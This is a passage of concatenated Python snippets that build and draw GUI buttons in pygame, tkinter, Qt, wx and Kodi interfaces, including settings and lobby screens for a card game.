button_2.update()\n button_2.draw(screen)\n\n else:\n button_1 = Button('On','', (150,150,150), 510, 333, 40, 40)\n button_1.update()\n button_1.draw(screen)\n\n button_2 = Button('Off','', (150,50,50), 560, 333, 40, 40)\n button_2.update()\n button_2.draw(screen)\n\n # Music settings\n button_music = Button('Music: ','', (0,0,0), 330, 400, 150, 50, font_size = 40, alpha = 0)\n button_music.update()\n button_music.draw(screen)\n\n if ai_settings.music_indicator == True:\n button_1 = Button('On','', (50,150,50), 510, 403, 40, 40)\n button_1.update()\n button_1.draw(screen)\n\n button_2 = Button('Off','', (150,150,150), 560, 403, 40, 40)\n button_2.update()\n button_2.draw(screen)\n\n else:\n button_1 = Button('On','', (150,150,150), 510, 403, 40, 40)\n button_1.update()\n button_1.draw(screen)\n\n button_2 = Button('Off','', (150,50,50), 560, 403, 40, 40)\n button_2.update()\n button_2.draw(screen)\n\n # Theme settings\n button_theme = Button('Theme: ','', (0,0,0), 330, 470, 160, 50, font_size = 40, alpha = 0)\n button_theme.update()\n button_theme.draw(screen)\n\n if ai_settings.theme_indicator == 'Lith Harbor':\n button_1 = Button('Lith Harbor','', (50,150,50), 510, 470, 140, 50, font_size = 18)\n button_1.update()\n button_1.draw(screen)\n else:\n button_1 = Button('Lith Harbor','', (150,150,150), 510, 470, 140, 50, font_size = 18)\n button_1.update()\n button_1.draw(screen)\n\n if ai_settings.theme_indicator == 'Leafre':\n button_1 = Button('Leafre','', (50,150,50), 670, 470, 140, 50, font_size = 18)\n button_1.update()\n button_1.draw(screen)\n else:\n button_1 = Button('Leafre','', (150,150,150), 670, 470, 140, 50, font_size = 18)\n button_1.update()\n button_1.draw(screen)\n\n if ai_settings.theme_indicator == 'Pantheon':\n button_1 = Button('Pantheon','', (50,150,50), 510, 540, 140, 50, font_size = 18)\n button_1.update()\n button_1.draw(screen)\n else:\n button_1 = Button('Pantheon','', (150,150,150), 510, 540, 140, 50, font_size = 18)\n button_1.update()\n button_1.draw(screen)\n\n if ai_settings.theme_indicator == 'Ellinia':\n button_1 = Button('Ellinia','', (50,150,50), 670, 540, 140, 50, font_size = 18)\n button_1.update()\n button_1.draw(screen)\n else:\n button_1 = Button('Ellinia','', (150,150,150), 670, 540, 140, 50, font_size = 18)\n button_1.update()\n button_1.draw(screen)\n\n # AI speeding settings\n button_ai_speed = Button('AI Speed: ','', (0,0,0), 330, 620, 200, 50, font_size = 40, alpha = 0)\n button_ai_speed.update()\n button_ai_speed.draw(screen)\n\n if ai_settings.AI_speed_indicator == '1000':\n button_1 = Button('Fast','', (50,150,50), 550, 620, 80, 50, font_size = 18)\n button_1.update()\n button_1.draw(screen)\n else:\n button_1 = Button('Fast','', (150,150,150), 550, 620, 80, 50, font_size = 18)\n button_1.update()\n button_1.draw(screen)\n\n if ai_settings.AI_speed_indicator == '2000':\n button_1 = Button('Normal','', (50,150,50), 650, 620, 80, 50, font_size = 18)\n button_1.update()\n button_1.draw(screen)\n else:\n button_1 = Button('Normal','', (150,150,150), 650, 620, 80, 50, font_size = 18)\n button_1.update()\n button_1.draw(screen)\n\n if ai_settings.AI_speed_indicator == '3000':\n button_1 = Button('Slow','', (50,150,50), 750, 620, 80, 50, font_size = 18)\n button_1.update()\n button_1.draw(screen)\n else:\n button_1 = Button('Slow','', (150,150,150), 750, 620, 80, 50, font_size = 18)\n button_1.update()\n button_1.draw(screen)\n\n # Closed settings window button\n button_1 = Button('X','', (250,100,100), 870, 300, 30, 30, font_size = 18)\n 
button_1.update()\n button_1.draw(screen)", "def arrange_button(self):\r\n self.update_settings()\r\n if self.arrange_call is not None:\r\n self.arrange_call()", "def drawButtons(self):\n self.__pausedTitle.draw(self.__screen)\n self.__exitGameButton.draw(self.__screen)\n self.__resumeButton.draw(self.__screen)\n self.__mainMenuButton.draw(self.__screen)", "def normal_run(self):\n super().events_buttons(back=True)\n self.events_delete_btns()\n self.draw()", "def place_buttons(self):\n tk.Button(self.parent, text='^', command=self.up_callback).grid(row=0, column=1)\n tk.Button(self.parent, text='v', command=self.down_callback).grid(row=2, column=1)\n tk.Button(self.parent, text='>', command=self.right_callback).grid(row=1, column=2)\n tk.Button(self.parent, text='<', command=self.left_callback).grid(row=1, column=0)\n tk.Button(self.parent, text='<-', command=self.back_callback).grid(row=0, column=0)\n tk.Button(self.parent, text='OK', command=self.ok_callback).grid(row=1, column=1)\n tk.Button(self.parent, text='<<', command=self.rewind_callback).grid(row=3, column=0)\n tk.Button(self.parent, text='>||', command=self.pp_callback).grid(row=3, column=1)\n tk.Button(self.parent, text='>>', command=self.pp_callback).grid(row=3, column=2)\n\n tk.Button(self.parent, text='HOME', command=self.home_callback).grid(row=0, column=3)", "def lobby_screen_room_detail_display(ai_settings, screen, buttons,screen_status, button_status, card_database_filter, user, action, player2):\n\n if button_status.lobby_screen_room_detail_display == 'none':\n\n if button_status.lobby_screen_room_list_display == 'N/A':\n button5 = Button('Create a game:','', (0,0,0),400, 580, 400, 50, font_size = 20, alpha = 0)\n button5.update()\n button5.draw(screen)\n\n button3 = Button('CREATE','', (40,40,120),920, 607, 100, 50,alpha = 240)\n button3.update()\n button3.draw(screen)\n\n else:\n button5 = Button('Please join the existing game!','', (0,0,0),400, 580, 400, 50, font_size = 20, alpha = 0)\n button5.update()\n button5.draw(screen)\n\n\n\n elif button_status.lobby_screen_room_detail_display == 'my':\n\n if button_status.lobby_screen_room_status == '1/2':\n button5 = Button(user.name + \"'s game:\" + ' 1/2','', (0,0,0),400, 580, 400, 50, font_size = 20,font_color = (200,100,100), alpha = 0)\n button5.update()\n button5.draw(screen)\n elif button_status.lobby_screen_room_status == '2/2':\n button5 = Button(user.name + \"'s game:\" + ' 2/2','', (0,0,0),400, 580, 400, 50, font_size = 20, alpha = 0)\n button5.update()\n button5.draw(screen)\n\n if button_status.lobby_screen_my_ready_to_go == False:\n button3 = Button(user.name,'', (200,200,110),205, 635, 650, 35,alpha = 240)\n button3.update()\n button3.draw(screen)\n elif button_status.lobby_screen_my_ready_to_go == True:\n button3 = Button(user.name,'', (110,200,110),205, 635, 650, 35,alpha = 240)\n button3.update()\n button3.draw(screen)\n\n if button_status.lobby_screen_room_status == '1/2':\n button3 = Button('Empty','', (250,250,250),205, 680, 650, 35,alpha = 100)\n button3.update()\n button3.draw(screen)\n elif button_status.lobby_screen_room_status == '2/2':\n if button_status.lobby_screen_other_ready_to_go == False:\n button3 = Button(player2.name,'', (200,200,110),205, 680, 650, 35,alpha = 240)\n button3.update()\n button3.draw(screen)\n elif button_status.lobby_screen_other_ready_to_go == True:\n button3 = Button(player2.name,'', (110,200,110),205, 680, 650, 35,alpha = 240)\n button3.update()\n button3.draw(screen)\n\n if 
button_status.lobby_screen_prepare_to_go_display == False:\n if button_status.lobby_screen_room_status == '1/2':\n button3 = Button('NEXT','', (120,120,120),920, 607, 100, 50,alpha = 240)\n button3.update()\n button3.draw(screen)\n elif button_status.lobby_screen_room_status == '2/2':\n button3 = Button('NEXT','', (40,120,40),920, 607, 100, 50,alpha = 240)\n button3.update()\n button3.draw(screen)\n else:\n if button_status.lobby_screen_my_ready_to_go == False:\n\n button3 = Button('READY!','', (40,120,40),920, 607, 100, 50,alpha = 240)\n button3.update()\n button3.draw(screen)\n\n elif button_status.lobby_screen_my_ready_to_go == True:\n if button_status.lobby_screen_other_ready_to_go == True:\n button3 = Button('PLAY!','', (247, 201, 37),920, 607, 100, 50,alpha = 240)\n button3.update()\n button3.draw(screen)\n elif button_status.lobby_screen_other_ready_to_go == False:\n button3 = Button('WAIT!','', (40, 40, 120),920, 607, 100, 50,alpha = 240)\n button3.update()\n button3.draw(screen)\n\n\n button3 = Button('QUIT','', (120,40,40),920, 684, 100, 50,alpha = 240)\n button3.update()\n button3.draw(screen)\n\n elif button_status.lobby_screen_room_detail_display == 'other':\n\n if button_status.lobby_screen_room_status == '1/2':\n button5 = Button(player2.name + \"'s game:\" + ' 1/2','', (0,0,0),400, 580, 400, 50, font_size = 20,font_color = (200,100,100), alpha = 0)\n button5.update()\n button5.draw(screen)\n elif button_status.lobby_screen_room_status == '2/2':\n button5 = Button(player2.name + \"'s game:\" + ' 2/2','', (0,0,0),400, 580, 400, 50, font_size = 20, alpha = 0)\n button5.update()\n button5.draw(screen)\n\n if button_status.lobby_screen_my_ready_to_go == False:\n button3 = Button(player2.name,'', (200,200,110),205, 635, 650, 35,alpha = 240)\n button3.update()\n button3.draw(screen)\n elif button_status.lobby_screen_my_ready_to_go == True:\n button3 = Button(player2.name,'', (110,200,110),205, 635, 650, 35,alpha = 240)\n button3.update()\n button3.draw(screen)\n\n\n if button_status.lobby_screen_room_status == '1/2':\n button3 = Button('Empty','', (250,250,250),205, 680, 650, 35,alpha = 100)\n button3.update()\n button3.draw(screen)\n elif button_status.lobby_screen_room_status == '2/2':\n\n if button_status.lobby_screen_other_ready_to_go == False:\n button3 = Button(user.name,'', (200,200,110),205, 680, 650, 35,alpha = 240)\n button3.update()\n button3.draw(screen)\n elif button_status.lobby_screen_other_ready_to_go == True:\n button3 = Button(user.name,'', (110,200,110),205, 680, 650, 35,alpha = 240)\n button3.update()\n button3.draw(screen)\n\n if button_status.lobby_screen_prepare_to_go_display == True:\n if button_status.lobby_screen_other_ready_to_go == False:\n button3 = Button('READY!','', (40,120,40),920, 607, 100, 50,alpha = 240)\n button3.update()\n button3.draw(screen)\n elif button_status.lobby_screen_other_ready_to_go == True:\n button3 = Button('WAIT...','', (40,40,120),920, 607, 100, 50,alpha = 240)\n button3.update()\n button3.draw(screen)\n\n button3 = Button('QUIT','', (120,40,40),920, 684, 100, 50,alpha = 240)\n button3.update()\n button3.draw(screen)", "def battle_screen_battleground_button_display(ai_settings, screen, buttons,screen_status, button_status, card_database_filter, user, player2):\n if ('stage-2-other-action-detail-tactic-1' in screen_status.battle_screen_action_indicator\n or ('stage-2-character-action-' in screen_status.battle_screen_action_indicator and '-detail-tactic-1' in screen_status.battle_screen_action_indicator)\n or 
('stage-2-character-action-' in screen_status.battle_screen_action_indicator and 'easy-shot' in screen_status.battle_screen_action_indicator)\n or ('stage-2-character-action-' in screen_status.battle_screen_action_indicator and 'tricky-shot' in screen_status.battle_screen_action_indicator)\n or 'stage-3-monster-' in screen_status.battle_screen_action_indicator\n or 'stage-2-other-action-detail-easy-shot' in screen_status.battle_screen_action_indicator\n or 'stage-2-other-action-detail-tricky-shot' in screen_status.battle_screen_action_indicator\n ):\n if button_status.battle_screen_player1_battleground_indicator_display == True:\n if int(button_status.battle_screen_player1_battleground_indicator_position) <= 3:\n i = int(button_status.battle_screen_player1_battleground_indicator_position)\n monster_rect_x = 650\n monster_rect_y = 220 + 110*(i-1)\n button = Button('***','', (70,70,150),monster_rect_x + 50, monster_rect_y - 27, 30, 27)\n button.update()\n button.draw(screen)\n elif int(button_status.battle_screen_player1_battleground_indicator_position) <= 6:\n i = int(button_status.battle_screen_player1_battleground_indicator_position)\n monster_rect_x = 825\n monster_rect_y = 220 + 110*(i-4)\n button = Button('***','', (70,70,150),monster_rect_x + 50, monster_rect_y - 27, 30, 27)\n button.update()\n button.draw(screen)\n\n if button_status.battle_screen_player2_battleground_indicator_display == True:\n if int(button_status.battle_screen_player2_battleground_indicator_position) <= 3:\n i = int(button_status.battle_screen_player2_battleground_indicator_position)\n monster_rect_x = 420\n monster_rect_y = 220 + 110*(i-1)\n button = Button('***','', (70,70,150),monster_rect_x + 50, monster_rect_y - 27, 30, 27)\n button.update()\n button.draw(screen)\n elif int(button_status.battle_screen_player2_battleground_indicator_position) <= 6:\n i = int(button_status.battle_screen_player2_battleground_indicator_position)\n monster_rect_x = 245\n monster_rect_y = 220 + 110*(i-4)\n button = Button('***','', (70,70,150),monster_rect_x + 50, monster_rect_y - 27, 30, 27)\n button.update()\n button.draw(screen)", "def on_pushButton_clicked(self):\r\n # TODO: not implemented yet\r\n print 1", "def add_button(self):\n if len(self.datamodels) == 0:#In this case the button is deleted completely as there is no reference to it\n self.addDataDisplays = QtGui.QPushButton(self) #Draw (+) button to add data displays\n self.addDataDisplays.setText(\"+\")\n self.addDataDisplays.clicked.connect(self.add_data_display)\n self.verticalLayout.removeWidget(self.addDataDisplays)\n self.verticalLayout.addWidget(self.addDataDisplays)", "def show_buttons(self):\n for button in self.buttons:\n x = button.starting_x\n y = button.starting_y\n self.screen.fill(button.color, ((x, y), (button.width, button.height)))", "def add_side_buttons(self):\n # Top and bottom buttons\n for col in range(self._grid.width):\n top_button = widgets.HExitButton('^', -1, col)\n bottom_button = widgets.HExitButton('v', self._grid.height, col)\n self._graphic_grid.addWidget(top_button, 1, 2 + col)\n self._graphic_grid.addWidget(bottom_button,\n 2 + self._grid.height, 2 + col)\n top_button.clicked.connect(self.button_clicked)\n bottom_button.clicked.connect(self.button_clicked)\n # Left and right buttons\n for row in range(self._grid.height):\n left_button = widgets.VExitButton('<', row, -1)\n right_button = widgets.VExitButton('>', row, self._grid.width)\n self._graphic_grid.addWidget(left_button, 2 + row, 1)\n self._graphic_grid.addWidget(right_button,\n 2 
+ row, 2 + self._grid.width)\n left_button.clicked.connect(self.button_clicked)\n right_button.clicked.connect(self.button_clicked)", "def show_text_in_buttons(self):\n for button in self.buttons:\n self.screen.blit(button.rendered_text, button.get_text_position())", "def show_control_buttons(self):\n self.settings_button.show()\n self.radio_button.show()\n self.blank_button.show()\n self.close_button.show()", "def battle_screen_menu_display(ai_settings, screen, buttons,screen_status, button_status, card_database_filter, user, player2):\n if button_status.battle_screen_menu_display == True:\n\n button = Button('','', (0,0,0), 580, 30, 420, 340, alpha = 200)\n button.update()\n button.draw(screen)\n # Sound settings\n button_sound = Button('Sound: ','', (0,0,0), 601, 51, 105, 35, font_size = 28, alpha = 0)\n button_sound.update()\n button_sound.draw(screen)\n\n if ai_settings.sound_indicator == True:\n button_1 = Button('On','', (50,150,50), 447+280, 323-270, 28, 28)\n button_1.update()\n button_1.draw(screen)\n\n button_2 = Button('Off','', (150,150,150), 482+280, 323-270, 28, 28)\n button_2.update()\n button_2.draw(screen)\n\n else:\n button_1 = Button('On','', (150,150,150), 447+280, 323-270, 28, 28)\n button_1.update()\n button_1.draw(screen)\n\n button_2 = Button('Off','', (150,50,50), 482+280, 323-270, 28, 28)\n button_2.update()\n button_2.draw(screen)\n\n\n # Music settings\n button_music = Button('Music: ','', (0,0,0), 321+280, 370-270, 105, 35, font_size = 28, alpha = 0)\n button_music.update()\n button_music.draw(screen)\n\n if ai_settings.music_indicator == True:\n button_1 = Button('On','', (50,150,50), 447+280, 372-270, 28, 28)\n button_1.update()\n button_1.draw(screen)\n\n button_2 = Button('Off','', (150,150,150), 482+280, 372-270, 28, 28)\n button_2.update()\n button_2.draw(screen)\n\n else:\n button_1 = Button('On','', (150,150,150), 447+280, 372-270, 28, 28)\n button_1.update()\n button_1.draw(screen)\n\n button_2 = Button('Off','', (150,50,50), 482+280, 372-270, 28, 28)\n button_2.update()\n button_2.draw(screen)\n\n # Theme settings\n button_theme = Button('Theme: ','', (0,0,0), 321+280, 419-270, 112, 35, font_size = 28, alpha = 0)\n button_theme.update()\n button_theme.draw(screen)\n\n if ai_settings.theme_indicator == 'Lith Harbor':\n button_1 = Button('Lith Harbor','', (50,150,50), 447+280, 419-270, 98, 35, font_size = 16)\n button_1.update()\n button_1.draw(screen)\n else:\n button_1 = Button('Lith Harbor','', (150,150,150), 447+280, 419-270, 98, 35, font_size = 16)\n button_1.update()\n button_1.draw(screen)\n\n if ai_settings.theme_indicator == 'Leafre':\n button_1 = Button('Leafre','', (50,150,50), 559+280, 419-270, 98, 35, font_size = 16)\n button_1.update()\n button_1.draw(screen)\n else:\n button_1 = Button('Leafre','', (150,150,150), 559+280, 419-270, 98, 35, font_size = 16)\n button_1.update()\n button_1.draw(screen)\n\n if ai_settings.theme_indicator == 'Pantheon':\n button_1 = Button('Pantheon','', (50,150,50), 447+280, 468-270, 98, 35, font_size = 16)\n button_1.update()\n button_1.draw(screen)\n else:\n button_1 = Button('Pantheon','', (150,150,150), 447+280, 468-270, 98, 35, font_size = 16)\n button_1.update()\n button_1.draw(screen)\n\n if ai_settings.theme_indicator == 'Ellinia':\n button_1 = Button('Ellinia','', (50,150,50), 559+280, 468-270, 98, 35, font_size = 16)\n button_1.update()\n button_1.draw(screen)\n else:\n button_1 = Button('Ellinia','', (150,150,150), 559+280, 468-270, 98, 35, font_size = 16)\n button_1.update()\n 
button_1.draw(screen)\n\n # AI speeding settings\n button_ai_speed = Button('AI Speed: ','', (0,0,0), 321+280, 524-270, 140, 35, font_size = 28, alpha = 0)\n button_ai_speed.update()\n button_ai_speed.draw(screen)\n\n if ai_settings.AI_speed_indicator == '1000':\n button_1 = Button('Fast','', (50,150,50), 475+280, 524-270, 56, 35, font_size = 15)\n button_1.update()\n button_1.draw(screen)\n else:\n button_1 = Button('Fast','', (150,150,150), 475+280, 524-270, 56, 35, font_size = 15)\n button_1.update()\n button_1.draw(screen)\n\n if ai_settings.AI_speed_indicator == '2000':\n button_1 = Button('Normal','', (50,150,50), 545+280, 524-270, 56, 35, font_size = 15)\n button_1.update()\n button_1.draw(screen)\n else:\n button_1 = Button('Normal','', (150,150,150), 545+280, 524-270, 56, 35, font_size = 15)\n button_1.update()\n button_1.draw(screen)\n\n if ai_settings.AI_speed_indicator == '3000':\n button_1 = Button('Slow','', (50,150,50), 615+280, 524-270, 56, 35, font_size = 15)\n button_1.update()\n button_1.draw(screen)\n else:\n button_1 = Button('Slow','', (150,150,150), 615+280, 524-270, 56, 35, font_size = 15)\n button_1.update()\n button_1.draw(screen)\n\n # Closed settings window button\n button_1 = Button('X','', (250,100,100), 699+280, 300-270, 21, 21, font_size = 16)\n button_1.update()\n button_1.draw(screen)\n\n\n button_1 = Button('Concede and Quit!','', (170,70,70), 700, 310, 180, 40)\n button_1.update()\n button_1.draw(screen)", "def battle_screen_stable_button_display(ai_settings,grid, screen, buttons, screen_status, button_status, card_database_filter, user, player2):\n button_1 = Button('Rules','', (250,250,250),200, 0, 50, 30, font_color = (0,0,0), alpha = 150)\n button_1.update()\n button_1.draw(screen)\n # menu\n button_menu = Button('Menu','', (250,250,250),950, 0, 50, 30, font_color = (0,0,0), alpha = 150)\n button_menu.update()\n button_menu.draw(screen)\n # Display user name\n button2 = Button(user.name,'', (250,250,250),1110, 570, 90, 30, font_color = (0,0,0), alpha = 150)\n button2.update()\n button2.draw(screen)\n # Display opponent's name\n if player2.character_ai_index == '1':\n player2_AI = 'NIXIE'\n elif player2.character_ai_index == '2':\n player2_AI = 'MAYA'\n elif player2.character_ai_index == '3':\n player2_AI = 'IVAN'\n elif player2.character_ai_index == '4':\n player2_AI = 'SHERMAN'\n elif player2.character_ai_index == '5':\n player2_AI = 'MOBY'\n elif player2.character_ai_index == '6':\n player2_AI = 'MAHIBANG'\n elif player2.character_ai_index == '7':\n player2_AI = 'MISTMOON'\n elif player2.character_ai_index == '8':\n player2_AI = 'FANGBLADE'\n elif player2.identity == 'pvp':\n player2_AI = player2.name\n try:\n button2 = Button(player2_AI,'', (250,250,250),0, 570, 90, 30, font_color = (0,0,0), alpha = 150)\n button2.update()\n button2.draw(screen)\n except UnboundLocalError:\n pass\n # add menu button to buttons group\n if button_status.battle_screen_stable_button_backend:\n buttons.append(button_menu)\n button_status.battle_screen_stable_button_backend = False", "def addButton(self, which, type_=\"move\", v=None, parent=None):\n c = self.c\n p = c.p\n if v is None:\n v = p.v\n sc = scriptingController(c)\n mb = quickMoveButton(self, v, which, type_=type_)\n txt = self.txts[type_]\n\n if parent: # find parent button\n for i in self.buttons:\n if i[0].target.gnx == parent:\n parent = i[1]\n break\n else:\n g.es('Move to button parent not found, placing at top level')\n parent = None\n\n header = v.anyAtFileNodeName() or v.h # drop @auto etc.\n\n text 
= txt + \":\" + header if txt else header\n # createButton truncates text.\n\n\n if parent and g.app.gui.guiName().startswith(\"qt\"):\n pb = parent.button\n rc = QAction(text, pb)\n rc.triggered.connect(mb.moveCurrentNodeToTarget)\n pb.insertAction(pb.actions()[0], rc) # insert at top\n b = None\n mb.has_parent = True\n # New code.\n t = c.config.getString('mod-scripting-subtext') or ''\n t2 = pb.text()\n if not t.endswith(t):\n pb.setText(t2 + t)\n else:\n b = sc.createIconButton(\n args=None,\n text=text,\n command = mb.moveCurrentNodeToTarget,\n statusLine='%s current node to %s child of %s' % (\n type_.title(), which, v.h),\n kind=\"quick-move\"\n )\n if g.app.gui.guiName() == \"qt\":\n\n def cb_goto_target(checked, c=c, v=v):\n p = c.vnode2position(v)\n c.selectPosition(p)\n c.redraw()\n\n def cb_set_parent(checked, c=c, v=v, first=which, type_=type_):\n c.quickMove.set_parent(v, first, type_)\n\n def cb_permanent(checked, c=c, v=v, type_=type_, first=which):\n c.quickMove.permanentButton(v=v, type_=type_, first=first)\n\n # def cb_clear(event=None, c=c, v=v):\n # c.quickMove.clearButton(v)\n\n for cb, txt in [\n (cb_goto_target, 'Goto target'),\n (cb_permanent, 'Make permanent'),\n # (cb_clear, 'Clear permanent'),\n (cb_set_parent, 'Set parent'),\n ]:\n but = b.button\n rc = QAction(txt, but)\n rc.triggered.connect(cb) # type:ignore\n # insert rc before Remove Button\n but.insertAction(but.actions()[-1], rc)\n\n self.buttons.append((mb, b))", "def buttonPress(self, argv):\n self.entry.insert(END, argv)", "def create_play_button(self):\n play_button = Button(self.littleFrame, text=\"Rejouer\", font=(\"Arial\", 25), bg='white', relief='groove',\n fg='lightblue',\n command=self.start_game, width=8, activebackground='white',\n activeforeground='lightblue')\n play_button.grid(column=0, row=0)\n invisible_widget = Label(self.littleFrame, text=\" \", bg=\"lightblue\")\n invisible_widget.grid(column=1, row=0)", "def prepare_screen_button_display(ai_settings, screen, buttons,screen_status, button_status, card_database_filter, user, player2):\n for i in range(1,7):\n if user.deck_list_index == str(i):\n button_edit = Button('Edit','', (50,50,170),85 + 180* (i-1), 282, 60, 30)\n button_edit.update()\n button_edit.draw(screen)\n\n button_delete = Button('Delete','', (160,30,30), 155 + 180* (i-1), 282, 60, 30)\n button_delete.update()\n button_delete.draw(screen)\n\n # Red rectangle around opponent card\n for i in range(1,9):\n if player2.character_ai_index == str(i):\n if i <= 4:\n button_top = Button('','', (250,0,0), 65 + 160*(i-1), 390, 140, 5)\n button_top.update()\n button_top.draw(screen)\n\n button_bottom = Button('','', (250,0,0),65 + 160*(i-1), 575, 140, 5)\n button_bottom.update()\n button_bottom.draw(screen)\n\n button_left = Button('','', (250,0,0), 65 + 160*(i-1), 395, 5, 180)\n button_left.update()\n button_left.draw(screen)\n\n button_right = Button('','', (250,0,0), 200 + 160*(i-1), 395, 5, 180)\n button_right.update()\n button_right.draw(screen)\n else:\n button_top = Button('','', (250,0,0), 65 + 160*(i-5), 580, 140, 5)\n button_top.update()\n button_top.draw(screen)\n\n button_bottom = Button('','', (250,0,0),65 + 160*(i-5), 765, 140, 5)\n button_bottom.update()\n button_bottom.draw(screen)\n\n button_left = Button('','', (250,0,0), 65 + 160*(i-5), 585, 5, 180)\n button_left.update()\n button_left.draw(screen)\n\n button_right = Button('','', (250,0,0), 200 + 160*(i-5), 585, 5, 180)\n button_right.update()\n button_right.draw(screen)", "def display_next_command( self, event 
):\n if self.command_history_index < len( self.command_history ) - 1:\n self.command_history_index += 1\n self.delete( 0, tk.END )\n self.insert( 0, self.command_history[ self.command_history_index ] )", "def add_player_button():\r\n global state\r\n if not state == \"add\":\r\n clear_frames()\r\n\r\n \"\"\"Changing state global variable and subtitle and showing on screen\"\"\"\r\n state = \"add\"\r\n sub_title[\"text\"] = \"ADD PLAYER\"\r\n sub_title.pack()\r\n \"\"\"Create a new frame for showing the widgets that are specific for\r\n this form\"\"\"\r\n frame_buttons = create_frame()\r\n \"\"\"Adding all the widgets\"\"\"\r\n # Creating font for labels\r\n label_font = tkinter.font.Font(family='Arial', size=10)\r\n name = Label(frame_buttons[0], text=\"name: \", font=label_font)\r\n name.pack(fill=X)\r\n name_entry = Entry(frame_buttons[0], width=25, font=label_font)\r\n name_entry.focus()\r\n name_entry.pack()\r\n\r\n nickname = Label(frame_buttons[0], text=\"nickname: \", font=label_font)\r\n nickname.pack(fill=X)\r\n nickname_entry = Entry(frame_buttons[0], width=25, font=label_font)\r\n nickname_entry.pack()\r\n\r\n elo = Label(frame_buttons[0], text=\"elo: \", font=label_font)\r\n elo.pack(fill=X)\r\n variable1 = StringVar(frame_buttons[0])\r\n variable1.set(\"bronze 5\")\r\n elo_menu = OptionMenu(frame_buttons[0], variable1, \"unranked\", \"bronze 5\", \"bronze 4\", \"bronze 3\", \"bronze 2\",\r\n \"bronze 1\",\r\n \"silver 5\", \"silver 4\", \"silver 3\", \"silver 2\", \"silver 1\", \"gold 5\", \"gold 4\",\r\n \"gold 3\", \"gold 2\", \"gold 1\", \"platinum 5\", \"platinum 4\", \"platinum 3\", \"platinum 2\",\r\n \"platinum 1\", \"diamond 5\", \"diamond 4\", \"diamond 3\", \"diamond 2\", \"diamond 1\",\r\n \"master\", \"challenger\")\r\n elo_menu[\"font\"] = label_font\r\n elo_menu.pack(fill=X)\r\n\r\n first_role = Label(frame_buttons[0], text=\"first role: \", font=label_font)\r\n first_role.pack(fill=X)\r\n variable2 = StringVar(frame_buttons[0])\r\n variable2.set(\"Top Laner\")\r\n first_role_menu = OptionMenu(frame_buttons[0], variable2, \"Top Laner\", \"Jungler\", \"Mid Laner\",\r\n \"Adc or BottomCarry\", \"Support\")\r\n first_role_menu[\"font\"] = label_font\r\n first_role_menu.pack(fill=X)\r\n\r\n second_role = Label(frame_buttons[0], text=\"second role: \", font=label_font)\r\n second_role.pack(fill=X)\r\n variable3 = StringVar(frame_buttons[0])\r\n variable3.set(\"Jungler\")\r\n second_role_menu = OptionMenu(frame_buttons[0], variable3, \"Top Laner\", \"Jungler\", \"Mid Laner\",\r\n \"Adc or BottomCarry\", \"Support\")\r\n second_role_menu[\"font\"] = label_font\r\n second_role_menu.pack(fill=X)\r\n\r\n send_button = Button(frame_buttons[0], text=\"Save\", bg=\"dodgerblue2\", bd=10, fg='white', font=label_font)\r\n send_button[\"command\"] = partial(save_player, variable1, variable2, variable3, frame_buttons[0])\r\n send_button.pack(fill=X, padx=10, pady=10)", "def _state_main(self, gui):\n gui.pack_button.wait_variable(gui.buttons_on)", "def _state_main(self, gui):\n gui.pack_button.wait_variable(gui.buttons_on)", "def update_buttons(self):\n # Enable the Add/Remove/Up/Down measurements buttons if a Survey is loaded\n enable = self.mgr.obj is not None\n self.addButton.setEnabled(enable)\n self.removeButton.setEnabled(enable)\n self.upButton.setEnabled(enable)\n self.downButton.setEnabled(enable)\n \n # Enable the Add/Remove condition buttons if a Measurement is selected\n #enable = len(list(self.mgr.obj.measurements)) > 0\n enable = 
self.measurementTableWidget.rowCount() > 0\n self.addConditionButton.setEnabled(enable)\n self.removeConditionButton.setEnabled(enable)", "def create_buttons(self):\r\n return []", "def addButton(self, button):\n\t\tself.config._WITH_ACTIONS = True\n\t\tself.config.ACTIONS.append((\"button\", button))", "def add_NextButton(self):\n next_button = Button(text=\"Next\", font_size =\"20sp\", background_color =(1, 1, 1, 1), color =(1, 1, 1, 1), size =(32, 32), size_hint =(.3, .3)) #, pos =(300, 250)\n next_button.bind(on_release = lambda a : self.next_button_handler())\n self.layout.add_widget(next_button)", "def draw_buttons(self):\n for button in self.playing_buttons:\n button.draw(self.screen)", "def cb_something_2(self, button):\n print(\"Do Something 2\")", "def cb_something_3(self, button):\n print(\"Do Something 3\")", "def add_button(self, title, callback, display_opt=None):\n button = wx.Button(self.button_panel, -1, title)\n button.Bind(wx.EVT_BUTTON, callback)\n button.display_opt = display_opt\n self.buttons.append(button)\n self.button_sizer.Add(button, 0)", "def set_controls(self):\n # Image tnds\n image = pyxbmct.Image(addonfolder+artsfolder+'/tnds82.png')\n self.placeControl(image, 0, 0, rowspan=8, columnspan=16)\n\n\t\t# Image Welcome\n image = pyxbmct.Image(addonfolder+artsfolder+'/start.png')\n self.placeControl(image, 8, 4, rowspan=2, columnspan=8)\n\t\t\n\t\t# YES button\n self.yes_button = pyxbmct.Button('YES')\n self.placeControl(self.yes_button, 11, 6, rowspan=1, columnspan=2)\n self.connect(self.yes_button, lambda: self.page(OSCam))\n\n\t\t# NO button\n self.no_button = pyxbmct.Button('NO')\n self.placeControl(self.no_button, 11, 8, rowspan=1, columnspan=2)\n self.connect(self.no_button, lambda: self.page(Tvheadend))\n\n\t\t# Close button\n self.close_button = pyxbmct.Button('Exit')\n self.placeControl(self.close_button, 13, 15, rowspan=1, columnspan=1)\n self.connect(self.close_button, lambda: self.closepage())", "def on_pushButton_9_clicked(self):\n # TODO: not implemented yet\n raise NotImplementedError", "def makeButtons(self):\n self.but_run = QtWidgets.QPushButton('Run') \n self.but_status = QtWidgets.QPushButton('Status') \n self.but_brow = QtWidgets.QPushButton('View') \n self.but_remove = QtWidgets.QPushButton('Remove files') \n\n self.hboxB = QtWidgets.QHBoxLayout()\n self.hboxB.addWidget(self.but_run)\n self.hboxB.addWidget(self.but_status)\n self.hboxB.addWidget(self.but_brow)\n self.hboxB.addStretch(1) \n self.hboxB.addWidget(self.but_remove)\n\n self.but_run.clicked.connect(self.onRun)\n self.but_status.clicked.connect(self.onStatus)\n self.but_brow.clicked.connect(self.onBrow)\n self.but_remove.clicked.connect(self.onRemove)", "def paintButtons(self):\n\n imgPath = GG.genteguada.GenteGuada.getInstance().getDataPath(BUTTON_OK)\n buttonOK = guiobjects.OcempImageButtonTransparent(imgPath, self.buttonTooltips[\"ok\"], self.showTooltip, self.removeTooltip)\n buttonOK.topleft = [770, 30]\n buttonOK.connect_signal(ocempgui.widgets.Constants.SIG_CLICKED, self.changeConfiguration)\n self.window.add_child(buttonOK)\n\n imgPath = 